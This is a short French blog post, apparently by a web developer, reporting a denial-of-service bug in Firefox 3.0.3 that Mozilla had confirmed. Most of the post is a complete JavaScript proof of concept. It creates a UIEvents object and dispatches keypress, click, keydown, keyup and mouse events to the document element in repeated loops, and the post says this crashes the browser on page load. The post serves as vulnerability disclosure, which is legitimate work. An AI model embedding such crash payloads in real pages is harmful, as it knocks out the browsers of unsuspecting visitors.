Plantage sévère de Firefox 3.0.3

Nous avions beaucoup tapé sur Chome suite aux nombreux tests effectués dès sa sortie. Ces manipulations avaient permis de déceler des vulnérabilités et autres instabilités du navigateur. Mais il est également possible de mettre en avant des instabilités dans Firefox qui est pourtant bien plus âgé, même dans la dernière version (ie. 3.0.3) via quelques lignes de JavaScript. Il s’agit là d’une attaque dite de déni de service (DOS).

<script language = "JavaScript">
var moz303 = document.createEvent("UIEvents");

moz303.initUIEvent("keypress", true, true, this, 1);
for (var moz303_loop = 1 ; moz303_loop < 10 ; moz303_loop++)
{
document.documentElement.dispatchEvent(moz303);
}

moz303.initUIEvent("click", true, true, this, 1);
for (var moz303_loop = 1 ; moz303_loop < 10 ; moz303_loop++)
{
document.documentElement.dispatchEvent(moz303);
}

moz303.initUIEvent("onkeydown", true, true, this, 1);
for (var moz303_loop = 1 ; moz303_loop < 10 ; moz303_loop++)
{
document.documentElement.dispatchEvent(moz303);
}

moz303.initUIEvent("onkeyup", true, true, this, 1);
for (var moz303_loop = 1 ; moz303_loop < 10 ; moz303_loop++)
{
document.documentElement.dispatchEvent(moz303);
}

moz303.initUIEvent("onmousedown", true, true, this, 1);
for (var moz303_loop = 1 ; moz303_loop < 10 ; moz303_loop++)
{
document.documentElement.dispatchEvent(moz303);
}

moz303.initUIEvent("onmouseup", true, true, this, 1);
for (var moz303_loop = 1 ; moz303_loop < 10 ; moz303_loop++)
{
document.documentElement.dispatchEvent(moz303);
}
</script>

L’exécution de la page contenant ce code se traduit par un plantage pur et simple. Cette vulnérabilité a été confirmée par la fondation Mozilla et devrait donc être corrigée dans la prochaine mouture du navigateur.

Baptiste Simon aka TiChou

Ingénieur développeur web dans le secteur du e-commerce et du tourisme mais avant toute chose passionné par internet et ses intarissables ressources.

Les commentaires sont fermés

Partenaires et blog à la une